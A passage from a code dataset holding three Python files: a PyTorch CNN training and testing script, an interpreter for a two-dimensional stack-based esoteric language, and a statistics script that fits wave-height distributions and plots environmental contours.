mysentence in batchtraining_data:\n model.zero_grad()\n \n targets = mysentence[2].cuda()\n tag_scores = model(mysentence[0].cuda(),mysentence[1].cuda(),wikivec.cuda(),sim)\n loss = loss_function(tag_scores, targets)\n loss.backward()\n optimizer.step()\n lossestrain.append(loss.data.mean())\n print (epoch)\n modelsaved.append(copy.deepcopy(model.state_dict()))\n print (\"XXXXXXXXXXXXXXXXXXXXXXXXXXXX\")\n model.eval()\n \n recall=[]\n for inputs in batchval_data:\n \n targets = inputs[2].cuda()\n tag_scores = model(inputs[0].cuda(),inputs[1].cuda() ,wikivec.cuda(),sim)\n \n loss = loss_function(tag_scores, targets)\n \n targets=targets.data.cpu().numpy()\n tag_scores= tag_scores.data.cpu().numpy()\n \n \n for iii in range(0,len(tag_scores)):\n temp={}\n for iiii in range(0,len(tag_scores[iii])):\n temp[iiii]=tag_scores[iii][iiii]\n temp1=[(k, temp[k]) for k in sorted(temp, key=temp.get, reverse=True)]\n thistop=int(np.sum(targets[iii]))\n hit=0.0\n for ii in temp1[0:max(thistop,topk)]:\n if targets[iii][ii[0]]==1.0:\n hit=hit+1\n if thistop!=0:\n recall.append(hit/thistop)\n \n print ('validation top-',topk, np.mean(recall))\n \n \n \n modelperform.append(np.mean(recall))\n if modelperform[-1]>bestresults:\n bestresults=modelperform[-1]\n bestiter=len(modelperform)-1\n \n if (len(modelperform)-bestiter)>5:\n print (modelperform,bestiter)\n return modelsaved[bestiter]\n \nmodel = CNN(batchsize, len(word_to_ix), len(label_to_ix))\nmodel.cuda()\n\nloss_function = nn.BCELoss()\noptimizer = optim.Adam(model.parameters())\n\nbasemodel= trainmodel(model, 0)\ntorch.save(basemodel, 'CNN_model')\n\nmodel = CNN(batchsize, len(word_to_ix), len(label_to_ix))\nmodel.cuda()\nmodel.load_state_dict(basemodel)\nloss_function = nn.BCELoss()\noptimizer = optim.Adam(model.parameters())\nKSImodel= trainmodel(model, 1)\ntorch.save(KSImodel, 'KSI_CNN_model')\n\ndef testmodel(modelstate, sim):\n model = CNN(batchsize, len(word_to_ix), len(label_to_ix))\n model.cuda()\n model.load_state_dict(modelstate)\n loss_function = nn.BCELoss()\n model.eval()\n recall=[]\n lossestest = []\n \n y_true=[]\n y_scores=[]\n \n \n for inputs in batchtest_data:\n \n targets = inputs[2].cuda()\n \n tag_scores = model(inputs[0].cuda(),inputs[1].cuda() ,wikivec.cuda(),sim)\n\n loss = loss_function(tag_scores, targets)\n \n targets=targets.data.cpu().numpy()\n tag_scores= tag_scores.data.cpu().numpy()\n \n \n lossestest.append(loss.data.mean())\n y_true.append(targets)\n y_scores.append(tag_scores)\n \n for iii in range(0,len(tag_scores)):\n temp={}\n for iiii in range(0,len(tag_scores[iii])):\n temp[iiii]=tag_scores[iii][iiii]\n temp1=[(k, temp[k]) for k in sorted(temp, key=temp.get, reverse=True)]\n thistop=int(np.sum(targets[iii]))\n hit=0.0\n \n for ii in temp1[0:max(thistop,topk)]:\n if targets[iii][ii[0]]==1.0:\n hit=hit+1\n if thistop!=0:\n recall.append(hit/thistop)\n y_true=np.concatenate(y_true,axis=0)\n y_scores=np.concatenate(y_scores,axis=0)\n y_true=y_true.T\n y_scores=y_scores.T\n temptrue=[]\n tempscores=[]\n for col in range(0,len(y_true)):\n if np.sum(y_true[col])!=0:\n temptrue.append(y_true[col])\n tempscores.append(y_scores[col])\n temptrue=np.array(temptrue)\n tempscores=np.array(tempscores)\n y_true=temptrue.T\n y_scores=tempscores.T\n y_pred=(y_scores>0.5).astype(np.int)\n print ('test loss', np.mean(lossestest))\n print ('top-',topk, np.mean(recall))\n print ('macro AUC', roc_auc_score(y_true, y_scores,average='macro'))\n print ('micro AUC', roc_auc_score(y_true, y_scores,average='micro'))\n print ('macro F1', f1_score(y_true, y_pred, average='macro') )\n print ('micro F1', f1_score(y_true, y_pred, average='micro') )\n\nprint ('CNN alone: ')\ntestmodel(basemodel, 0)\nprint ('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\nprint ('KSI+CNN: ')\ntestmodel(KSImodel, 1)", "sub_path": "KSI_CNN.py", "file_name": "KSI_CNN.py", "file_ext": "py", "file_size_in_byte": 9837, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.manual_seed", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 89, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 94, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 95, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 97, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 100, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 120, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 123, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 126, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 128, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 226, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 226, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 227, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 235, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 235, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 236, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 236, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 238, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 244, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 296, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 298, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 299, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 300, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 301, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 302, "usage_type": "call"}]}
+{"seq_id": "308003631", "text": "from codeModule import *\nimport colorama, time, os, sys\nfrom colorama import Fore, Back, Style\n\nclass Stack:\n def __init__(self):\n self.stack = []\n\n def __str__(self):\n t = self.stack[::-1]\n out = \"___\"\n for i in t:\n out = \"{}\\n {} \".format(out, i)\n out = out + \"\\n\" + \"___\"\n return out\n\n def pop(self):\n if self.stack:\n return self.stack.pop()\n else:\n return 0\n\n def push(self, val):\n self.stack.append(val)\n\n\ndef cont(v, a, b):\n if v < a:\n return b\n if v > b:\n return a\n return v\n\n\nclass Pointer:\n def __init__(self, diagram):\n self.UP = 0\n self.RIGHT = 1\n self.DOWN = 2\n self.LEFT = 3\n\n self.diagram = diagram\n self.maxX = self.diagram.calcMaxX()\n self.maxY = len(self.diagram.code)\n self.x = 0\n self.y = 0\n self.dir = self.RIGHT\n\n def forward(self):\n if self.dir == self.UP:\n self.y = cont(self.y - 1, 0, self.maxY-1)\n elif self.dir == self.DOWN:\n self.y = cont(self.y + 1, 0, self.maxY-1)\n elif self.dir == self.RIGHT:\n self.x = cont(self.x + 1, 0, self.maxX-1)\n elif self.dir == self.LEFT:\n self.x = cont(self.x - 1, 0, self.maxX-1)\n\n def turnRight(self):\n self.dir = cont(self.dir + 1, self.UP, self.LEFT)\n\n def turnLeft(self):\n self.dir = cont(self.dir - 1, self.UP, self.LEFT)\n\n\nclass Diagram:\n def __init__(self, code=\"\", verbose=False):\n if code:\n self.code = code\n else:\n self.getCode()\n self.stack = Stack()\n self.pointer = Pointer(self)\n self.v = verbose\n if self.v:\n colorama.init()\n\n def getCode(self):\n if len(sys.argv) == 2:\n fName = sys.argv[1]\n else:\n fName = input(\"File Name: \")\n print()\n with open(fName, \"r\") as file:\n data = file.read().split(\"\\n\")\n del data[-1]\n #print(data)\n for i in range(len(data)):\n data[i] = list(data[i])\n #print(data)\n self.code = data\n mx = self.calcMaxX()\n for i in self.code:\n for t in range(mx - len(i)):\n i.append(' ')\n\n def calcMaxX(self):\n lst = list(map(lambda x: len(x), self.code))\n return max(lst)\n\n def run(self):\n while True:\n if self.v:\n if os.name == \"nt\":\n os.system('cls')\n elif os.name == \"posix\":\n os.system('clear')\n for y in range(len(self.code)):\n for x in range(len(self.code[y])):\n #print(\"{}\".format(Style.RESET_ALL), end=\"\")\n style = \"\"\n if x == self.pointer.x and y == self.pointer.y:\n style = Back.RED\n print(\"{}{}\".format(style, self.code[y][x]), end=\"\")\n print(\"{}\".format(Style.RESET_ALL), end=\"\")\n print()\n time.sleep(0.1)\n #print()\n exec(codes[self.code[self.pointer.y][self.pointer.x]])\n self.pointer.forward()\n\n\nif __name__ == \"__main__\":\n d = Diagram(verbose=False)\n d.run()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3348, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "colorama.init", "line_number": 76, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 79, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.name", "line_number": 104, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 105, "usage_type": "call"}, {"api_name": "os.name", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 107, "usage_type": "call"}, {"api_name": "colorama.Back.RED", "line_number": 113, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 113, "usage_type": "name"}, {"api_name": "colorama.Style.RESET_ALL", "line_number": 115, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 115, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 117, "usage_type": "call"}]}
+{"seq_id": "517749613", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 3 13:59:12 2020\n\n@author: astah\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.stats import norm, weibull_min, chi2, lognorm, kstest\nfrom scipy.optimize import curve_fit\nfrom read_write import determine_file_name_e1, write_contour, read_contour\nfrom contour_statistics import points_outside\nfrom plot import PlottedSample, plot_contour\nfrom read_write import read_dataset\nplt.close('all')\n\nplt.close('all')\n#%% Functions to fit\n# Power function\ndef power3(x, a, b, c):\n return a + b * x ** c\n\n# Exponential function\ndef exp3(x, a, b, c):\n return a + b * np.exp(c * x)\n\n#%% Read dataset A, B or C.\nDATASET_CHAR = 'A'\nfile_path = '../datasets/' + DATASET_CHAR + '.txt'\nsample_hs, sample_tz, label_hs, label_tz= read_dataset(file_path)\n\ndf = pd.read_csv(file_path, sep='; ')\n#%% Inspect the marginal distributions\n\nweib_par1 = weibull_min.fit(df[df.columns[1]], loc=0)\nlogn_par1 = lognorm.fit(df[df.columns[1]], loc=0)\n\nweib_par2 = weibull_min.fit(df[df.columns[2]], loc=0)\nlogn_par2 = lognorm.fit(df[df.columns[2]], loc=0)\n\n#%% Goodness of fit\n\nprint(kstest(df[df.columns[1]].values, 'weibull_min', args=weib_par1)) \nprint(kstest(df[df.columns[1]].values, 'lognorm', args=logn_par1))\n\nprint(kstest(df[df.columns[2]].values, 'weibull_min', args=weib_par2))\nprint(kstest(df[df.columns[2]].values, 'lognorm', args=logn_par2))\n\n#%% Plot the distributions\n#n_bins = 100\n\n#plt.figure()\n#plt.subplot(211)\n#n1, bins1, _ = plt.hist(df[df.columns[1]], n_bins, density=True, label = df.columns[1])\n#plt.plot(bins1, weibull_min.pdf(bins1,*weib_par1), label='Weibull')\n#plt.plot(bins1, lognorm.pdf(bins1,*logn_par1), label='Lognorm')\n#plt.legend(loc='best')\n#plt.subplot(212)\n#n, bins, _ = plt.hist(df[df.columns[2]], n_bins, density=True, label = df.columns[2])\n#plt.plot(bins, weibull_min.pdf(bins,*weib_par2), label='Weibull')\n#plt.plot(bins, lognorm.pdf(bins,*logn_par2), label='Lognorm')\n#plt.legend(loc='best')\n\n#%% Bin the data to find the conditoinal marginal distribution\ns_min = df[df.columns[1]].min()\ns_max = df[df.columns[1]].max()\n\nbin_size = 0.5\ns_bins = np.arange(np.floor(s_min), np.ceil(s_max), bin_size) + bin_size/2\ns_binedges = s_bins + bin_size/2\n\ns_ind_bin = np.digitize(df[df.columns[1]], bins=s_binedges)\n\nunique, counts = np.unique(s_ind_bin, return_counts=True)\n\nind_min_bin = unique[counts>10][0]\nind_max_bin = unique[counts>10][-1]\nx_bins = s_bins[ind_min_bin:ind_max_bin+1]\nreal_bins = np.zeros(len(x_bins))\n\nlogn_par_cond = np.zeros((len(x_bins),3))\nmu_cond = np.zeros(len(x_bins))\nsig_cond = np.zeros(len(x_bins))\n\nplot_bins = np.arange(0,14,0.2)\n\nfor i in range(len(x_bins)):\n mask1 = s_ind_bin == i + ind_min_bin\n real_bins[i] = df[df.columns[1]][mask1].mean()\n logn_par_cond[i,:] = lognorm.fit(df[df.columns[2]][mask1], floc=0)\n mu_cond[i] = np.mean(np.log(df[df.columns[2]][mask1]))\n sig_cond[i] = np.std(np.log(df[df.columns[2]][mask1]))\n# plt.figure()\n# b = plt.hist(df[df.columns[2]][mask1], bins= plot_bins, density=True)\n# plt.plot(b[1], lognorm.pdf(b[1],*logn_par_cond[i,:]), color='g')\n\n#bounds = ([0, 0, -np.inf], [np.inf, np.inf, np.inf])\nbounds = ([-1, 0, -np.inf], [np.inf, np.inf, np.inf])\np0_mu = [0, 2, 0.1]\np0_sig = [0.1, 0.1, -0.3]\n\nmu_vars = curve_fit(power3, real_bins, mu_cond, p0=p0_mu, bounds=bounds)[0]\nsig_vars = curve_fit(exp3, real_bins, sig_cond, p0=p0_sig, bounds=bounds)[0]\n\nsig_func = curve_fit(exp3, real_bins, logn_par_cond[:,0], p0=p0_sig, bounds=bounds)[0]\nmu_func = curve_fit(power3, real_bins, np.log(logn_par_cond[:,2]), p0=p0_mu, bounds=bounds)[0]\n\nplt.figure()\nplt.subplot(211)\nplt.plot(real_bins, np.log(logn_par_cond[:,2]), 'o')\nplt.plot(real_bins, mu_cond, 'o')\nplt.plot(x_bins, power3(x_bins, *mu_func))\nplt.ylabel(r'$\\mu$: scale parameter')\nplt.subplot(212)\nplt.plot(real_bins, logn_par_cond[:,0], 'o')\nplt.plot(real_bins, sig_cond, 'o')\nplt.plot(x_bins, exp3(x_bins, *sig_func))\nplt.plot(x_bins, exp3(x_bins, *sig_vars))\nplt.ylabel(r'$\\sigma$: shape parameter')\n\n\n#%% Perform the IDS\n\nT1 = 1\nT20 = 20\n\n#beta1 = norm.ppf(1- 10/(T1*len(df)))\n#beta20 = norm.ppf(1- 10/(T20*len(df)))\nbeta1 = np.sqrt(chi2.ppf(1- 10/(T1*len(df)), df=2))\nbeta20 = np.sqrt(chi2.ppf(1- 10/(T20*len(df)), df=2))\n\nphi = np.linspace(0, 2 * np.pi, 360, endpoint=False)\n\nu0_1 = beta1*np.cos(phi)\nu1_1 = beta1*np.sin(phi)\n\nu0_20 = beta20*np.cos(phi)\nu1_20 = beta20*np.sin(phi)\n\nx1_1 = lognorm.ppf( norm.cdf(u1_1), *logn_par1)\nx1_20 = lognorm.ppf( norm.cdf(u1_20), *logn_par1)\n\n# The weibull conditional distribution\nsig_x1_1 = exp3(x1_1, *sig_func)\nmu_x1_1 = power3(x1_1, *mu_func)\n\nsig_x1_20 = exp3(x1_20, *sig_func)\nmu_x1_20 = power3(x1_20, *mu_func)\n\nx0_1 = lognorm.ppf( norm.cdf(u0_1), sig_x1_1, loc=0, scale=np.exp(mu_x1_1))\nx0_20 = lognorm.ppf( norm.cdf(u0_20), sig_x1_20, loc=0, scale=np.exp(mu_x1_20))\n#%%\nh = sns.jointplot(x= df.columns[2] , y=df.columns[1] , data=df, s=5)\nh.x, h.y = x0_1, x1_1\nh.plot_joint(plt.plot, color='C1')\nh.x, h.y = x0_20, x1_20\nh.plot_joint(plt.plot, color='C2')\n\n#%% E1 requirements:\n# Save the contours as csv files in the required format.\nfolder_name = 'contour_coordinates/'\nfile_name_1 = determine_file_name_e1('Asta', 'Hannesdottir', DATASET_CHAR, T1)\nwrite_contour(x1_1, #y-axis\n x0_1,\n folder_name + file_name_1,\n label_x=df.columns[1],\n label_y=df.columns[2])\nfile_name_20 = determine_file_name_e1('Asta', 'Hannesdottir', DATASET_CHAR, T20)\nwrite_contour(x1_20,\n x0_20,\n folder_name + file_name_20,\n label_x=df.columns[1],\n label_y=df.columns[2])\n\n# Read the contours from the csv files.\n(contour_hs_1, contour_tz_1) = read_contour(folder_name + file_name_1)\n(contour_hs_20, contour_tz_20) = read_contour(folder_name + file_name_20)\n\n# Find datapoints that exceed the 20-yr contour.\nhs_outside, tz_outside, hs_inside, tz_inside = \\\n points_outside(contour_hs_20,\n contour_tz_20,\n np.asarray(df[df.columns[1]].values),\n np.asarray(df[df.columns[2]].values))\nprint('Number of points outside the contour: ' + str(len(hs_outside)))\n#%%\nnan_mask = np.isnan(contour_tz_20)\n\nfig = plt.figure(figsize=(5, 5), dpi=150)\nax = fig.add_subplot(111)\n\nplotted_sample = PlottedSample(x=np.asarray(sample_tz),\n y=np.asarray(sample_hs),\n ax=ax,\n x_inside=tz_inside,\n y_inside=hs_inside,\n x_outside=tz_outside,\n y_outside=hs_outside,\n return_period=T20)\n# Plot the 1-year contour.\nplot_contour(x=contour_tz_1,\n y=contour_hs_1,\n ax=ax,\n contour_label=str(T1) + '-yr contour',\n x_label=label_tz,\n y_label=label_hs,\n line_style='b--',\n plotted_sample=plotted_sample)\n\n# Plot the 20-year contour and the sample.\nplot_contour(x=contour_tz_20[~nan_mask],\n y=contour_hs_20[~nan_mask],\n ax=ax,\n contour_label=str(T20) + '-yr contour',\n x_label=label_tz,\n y_label=label_hs,\n line_style='b-')#,\n# plotted_sample=plotted_sample)\nplt.title('Dataset ' + DATASET_CHAR)\nplt.show()\nplt.savefig('../results/figures/hannesdottir_asta_dataset_'+DATASET_CHAR+'_1_20.png', dpi=300)", "sub_path": "participants-code/contribution-3/e1_baseline_dataset_a_to_c_asta.py", "file_name": "e1_baseline_dataset_a_to_c_asta.py", "file_ext": "py", "file_size_in_byte": 7528, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.close", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 29, "usage_type": "call"}, {"api_name": "read_write.read_dataset", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 36, "usage_type": "call"}, {"api_name": "scipy.stats.weibull_min.fit", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.stats.weibull_min", "line_number": 39, "usage_type": "name"}, {"api_name": "scipy.stats.lognorm.fit", "line_number": 40, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 40, "usage_type": "name"}, {"api_name": "scipy.stats.weibull_min.fit", "line_number": 42, "usage_type": "call"}, {"api_name": "scipy.stats.weibull_min", "line_number": 42, "usage_type": "name"}, {"api_name": "scipy.stats.lognorm.fit", "line_number": 43, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 43, "usage_type": "name"}, {"api_name": "scipy.stats.kstest", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.stats.kstest", "line_number": 48, "usage_type": "call"}, {"api_name": "scipy.stats.kstest", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.stats.kstest", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.digitize", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 89, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm.fit", "line_number": 94, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 94, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 102, "usage_type": "attribute"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 106, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 107, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 109, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 133, "usage_type": "call"}, {"api_name": "scipy.stats.chi2.ppf", "line_number": 133, "usage_type": "call"}, {"api_name": "scipy.stats.chi2", "line_number": 133, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 134, "usage_type": "call"}, {"api_name": "scipy.stats.chi2.ppf", "line_number": 134, "usage_type": "call"}, {"api_name": "scipy.stats.chi2", "line_number": 134, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 142, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm.ppf", "line_number": 144, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 144, "usage_type": "name"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 144, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 144, "usage_type": "name"}, {"api_name": "scipy.stats.lognorm.ppf", "line_number": 145, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 145, "usage_type": "name"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 145, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 145, "usage_type": "name"}, {"api_name": "scipy.stats.lognorm.ppf", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 154, "usage_type": "name"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 154, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm.ppf", "line_number": 155, "usage_type": "call"}, {"api_name": "scipy.stats.lognorm", "line_number": 155, "usage_type": "name"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 155, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 155, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 155, "usage_type": "call"}, {"api_name": "seaborn.jointplot", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 159, "usage_type": "attribute"}, {"api_name": 